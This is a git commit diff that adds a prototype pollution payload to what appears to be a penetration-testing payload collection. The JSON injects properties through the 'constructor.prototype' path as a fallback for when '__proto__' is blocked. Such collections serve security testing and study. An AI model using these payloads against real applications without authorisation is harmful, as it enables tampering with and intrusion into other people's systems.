adding the payload for Polluting the prototype via the constructor property in JSON input

Somtimes `__proto__` property may not work, so adding the payload for Polluting the prototype via the `constructor` property in JSON input
This commit is contained in:
Aftab Sama 2024-01-03 17:24:28 +05:30 committed by GitHub
parent cbc6e78d2a
commit 08063f0830
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -99,6 +99,19 @@ Asynchronous payload for NodeJS.
}
```
Polluting the prototype via the `constructor` property instead.
```js
{
"constructor": {
"prototype": {
"foo": "bar",
"json spaces": 10
}
}
}
```
### Prototype Pollution in URL